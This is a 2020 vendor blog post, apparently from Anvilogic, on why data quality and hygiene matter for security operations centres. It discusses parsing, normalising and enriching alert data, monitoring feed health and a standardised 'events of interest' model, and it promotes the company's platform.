2020-08-09

Becoming a Mature SOC: Part 2 — Data Hygiene

The first post in this series discussed how the data point relationship (the curve) between enterprise spend and enterprise breaches has not flattened. We have seen a record amount of spending on security technology, so we would expect to see a drop in security breaches or improvements around the dwell time to respond. That is not the case, it’s almost exactly the opposite — record spending is occurring, and at the same time the number of confirmed breaches is increasing at record highs. In addition, there are also significant increases to the dwell time (amount of days a breach goes undetected or remediated) within the last 10 years as well.

There are 4 primary areas we will talk about in this series on the journey to becoming a mature SOC: (1) prioritizing and understanding threats, (2) data quality/hygiene, (3) detection content, and (4) productivity and response. This post will address the elephant in the room — Data Quality & Hygiene.

Data — it almost seems like you can’t live with it, but obviously can’t live without it. As the amount of technology that generates machine data grows, the amount of distributed data sets that a SOC may be responsible for maintaining and that may be critical for incident response purposes becomes complex. After almost a decade of experience in a Fortune 50 SOC, there were numerous challenges when it came to detecting, analyzing, and mitigating cybersecurity threats. Oftentimes, management would ask, “What can we do to help?” The response was always, always, to help improve the data quality issues we are experiencing.

Fixing data is not sexy, it’s not fun, and it’s not “innovative,” but the downstream impacts of not having parsed, normalized, and enriched data sets in a SOC are significant. Here are some of the common downstream impacts SOCs experience with complex data problems:

You likely can’t use many of the detection tools (ex. SIEMs) or advanced detection capabilities (ex. AI or machine learning) effectively or “as advertised” with bad data. Since the code can’t work as expected the volumes of signals and alerts that come from this technology is significantly higher than originally expected.
You can’t correlate activity across multiple data domains, and if you can, you are often writing complex parsing/normalization code at search time to help you connect the dots — code that is often not reusable and hard to maintain over time.
Triage and investigations become extremely complicated, making it difficult for analysts to try and understand what happened, and the complexity in the data sets makes it challenging to connect the dots. Breaches likely go undetected for a couple reasons, (1) maybe you didn’t even get an alert, but (2) even if you did, your analyst probably wasn’t able to easily understand what happened.
The SOC becomes a bottleneck for new business expansion. It is important that the new data feeds you onboard to protect the new business units are parsed, normalized, and aligned with existing data models to ensure consistency. However, that data cleansing process can take some time, especially if the new data feeds are complex or unknown to the people involved in the onboarding process. Because of this, oftentimes, the data is just onboarded with a plan to fix it later, which impacts alerting, triage, and response times. Instead of just using similar, already configured alerting packs for the new business units, you are now writing custom alerting for the new, specific data feeds to fulfill monitoring requirements before the new business goes live. This just continuously adds to technical debt of your SOC and makes it harder and more time consuming to fix overtime.
Your long-term strategy is impacted — your dreams of an autonomous SOC, machine learning driven triage and response, becoming more proactive through hunting and using AI to recommend suspicious activity is not possible, no matter how much money or resources you throw at it, if you don’t solve the upstream data problems.

Data issues go further than just parsing, normalization, and enrichment. SIEMs or runtime engines are normally gathering hundreds of data sources, from different environments, at a massive scale. Not only is the structure a problem, but the health and integrity of that data is also a problem.

Data into the SIEM can often be delayed, randomly, which causes inconsistencies in detection and response.
Timestamps! Yes, believe it or not, sometimes inconsistencies in the time zone can exist from events and that makes it very difficult to build realistic timelines to make a decision on what happened during an incident.
Logging patterns change, especially during transport, and that can break parsing — is there any monitoring in place to notify you when this happens? Can half of your alerts break when this occurs?
How often do you deal with feeds dropping? Does your SOC even know when a critical feed goes down, or if a subset of machines or appliances stop reporting data? This impacts your accuracy in exposure checks when telling your boss, “nope, we didn’t see any activity of x.exe on our endpoints, we are good.”

All of these issues significantly impact your downstream effectiveness in your ability to detect and respond to cyber attacks, and if you haven’t invested time and energy into ensuring your data is usable, then you likely are wasting money on cool buzz word software that does AI, ML, and automation — you have likely fixed some symptoms, but you are nowhere close to curing the disease.

‍Ok, let’s agree that these problems exist, and if you are a company that is analyzing 50–100TB or even petabytes of data a day, it is obviously very difficult to solve. However, let’s take a step back and focus on some ways to start to address the problems. A good approach may be to start with your alerts — yes, the notifications that are supposed to tell you potentially malicious activity is occurring. You may generate hundreds of thousands of these events per day across all of your technologies and alerting engines (ex. Custom detection content, EDRs, AV, IDS, WAF, Network/NetFlow, CASB, etc.). Ensuring these events are correctly parsed, normalized, and enriched, is a good place to start.

This allows you to improve on your ability to correlate alert activity across complicated, distributed data sets, as well as provide you the ability to receive a better return on investment for existing detection tools — you may actually start to use those random alerts within detection scenarios if you can improve how you correlate the alerts over a period of time. It is highly unlikely that a 250 day breach did not trigger at least 1 suspicious event across these alerting engines, the issue is you didn’t know because you couldn’t see through the noise or couldn’t use it in conjunction with other activity in a way that triggered an effective response. Other fancy ML engines won’t be able to connect the dots either, without some sort of structured data set!

‍So, what’s the solution? Here are some things to think about when trying to build a better alerting architecture that can handle some of the data quality problems SOCs have been facing.

Create a data model for your alert output. Yes, just try that first. If you can start to easily correlate alert output, you can begin to connect the dots between distributed data sets, which can lead to better detection opportunities. This also can allow you to create attack scenarios (triggering alerts only if the same machines generate over X alerts in a specific period of time).
Enrich your alert output at search time or at index time (even in the stream on the data pipeline if you are so inclined) so that the enriched data is also included in the alert. This structured data set is what will allow for the SOC to receive as much context as possible when triaging and investing an alert. This allows for analysts to be able to make better decisions, improving their time to respond and mitigate a potential threat.
Implement health monitoring on your alerting content to ensure alerting is operating as expected. Take samples of the suspicious activity your alerting is trying to detect and run those malicious alert samples through your SIEM engine to ensure alerts are operating as expected. Once mature, you can even start building detection logic around when raw data feeds drop, or when event formats/patterns change on the stream that break parsing and normalization.

What Does Structured Data Look Like?

‍Let me show you a simple example using an alert from Windows Event logs on the differences between the raw event and the structured event. This alert is looking for a PowerShell Invoke-Expression.

Now, look at the same output when using Anvilogic. This is an example of what our alerts look like inside of our Events of Interest model. Not only do we keep the raw event context, but we also automatically parse and normalize the data to our alert data model, which includes additional tagging and enrichment to aid in advanced correlation.

As you can see, having your alert output indexed in a way that is already parsed, normalized, and enriched to a standardized data model now allows you to be able to run more advanced analytics (correlation, ML, etc.) across the nicely indexed data set. Not only are open-source frameworks used during enrichment (MITRE ATT&CK, Cyber Kill Chain, Threat Groups, etc.), but also it is tagged using OS type, machine type, and uses a specific data domain that ensures field value pair standardization across the output. This type of organized data set now allows you to build correlations between not only the details of the malicious event (ex. Process and command line arguments), but also around the enriched values as well (ex. avl_mitre_technique=”PowerShell”).

‍How is Anvilogic Helping in Data Quality?

‍At Anvilogic — we are focused on actually cleaning up existing unstructured alerting data sets, not just providing you with more alerts that make it harder for you to correlate (as shown in the alert sample above). We are using Machine Learning to better understand the best ways to parse, normalize and enrich alert data sets coming from distributed systems. This means, you should be able to use alerts from any technology, whether it be EDR, Anti-Virus, IDS, WAF, or custom SIEM logic produced by your threat detection teams, in conjunction with new content from the Anvilogic platform, to generate an events of interest data set that allows you to build more advanced, effective, threat scenario correlation.

The enriched event shown above is an example of what our alert output looks like, all content from our platform is stored in this manner, and we are able to automatically align your existing alerting content to meet that structure to make your custom alerts more effective for you too.

Below is the next generation alerting flow architecture that will likely exist in most large enterprises in the coming years. In order to be able to handle alert output from each distributed system (which can be millions of events per day), Anvilogic is focused on trying to help you solve some of those strategic initiatives as well:

Use of ML models to better normalize, tag and enrich alerting data sets on the data stream to allow for better indexing across distributed SIEMs or appliances (ex. EDRs, Cloud SIEM, on-premises SIEM, etc.) . You should try to fix your data hygiene and enrichment issues as far upstream as possible, not using your SOAR platform.
Align all detection output to standardized data models to store “events of interest” (aka. Alert results). You should be able to do this at either (1) search time or (2) at index time, so that you can easily correlate or use additional code to find patterns of attack within your network.
Remove the roadblocks that are preventing your new business services from quickly expanding — the SOC should no longer be that bottleneck. You should be able to point alert data (indifferent of the data domain it is coming from) to your events of interest quickly and leverage an enrichment and normalization engine on the data stream processor to tag distributed alerting data sets automatically.
Since the focus is on structured alerting data sets, you can now reuse detection content that can correlate the alert activity based on the enrichment values (ex. MITRE ATT&CK), which allows you to easily deploy the same threat scenario correlation use cases across newly onboarded infrastructure quickly.
Apply health monitoring code at both the SIEM level (raw data ingestion) and the correlation level (events of interest) to notify production support teams when feeds or logging patterns change that cause alerts to break or not operate as expected.
Leverage SOAR code for remediation and not enrichment. SOAR integrations with different security technology APIs allow for powerful ways to improve mitigation dell time, especially when you have higher efficacy Threat Scenarios generating response plans. In the future, Anvilogic will also be focused on providing common mitigation code that can be plugged into SOAR playbooks to help automation remediation efforts.

The below graphic shows how you can begin to send alerts from your existing technology stacks (on-premises, cloud, and XDR tools) to an events of interest data model. Anvilogic can help you in this journey of standardization of your detection output so you can build a better program around detection and response.

In summary, Anvilogic is focused on trying to solve the real problems that have plagued SOCs for decades by:

Fixing data quality issues upstream, by providing code and models to help parse, tag, and enrich alerting data sets that come from your distributed systems.
Fill your detection and health monitoring gaps at the SIEM layer, providing logic for multiple SIEM languages across the MITRE ATT&CK framework.
Allow you to create codeless, SIEM agnostic, content packs (ex. Threat Scenarios) and/or leverage our existing correlation use cases to identify patterns of attack that can be sent to a SOAR platform for mitigation.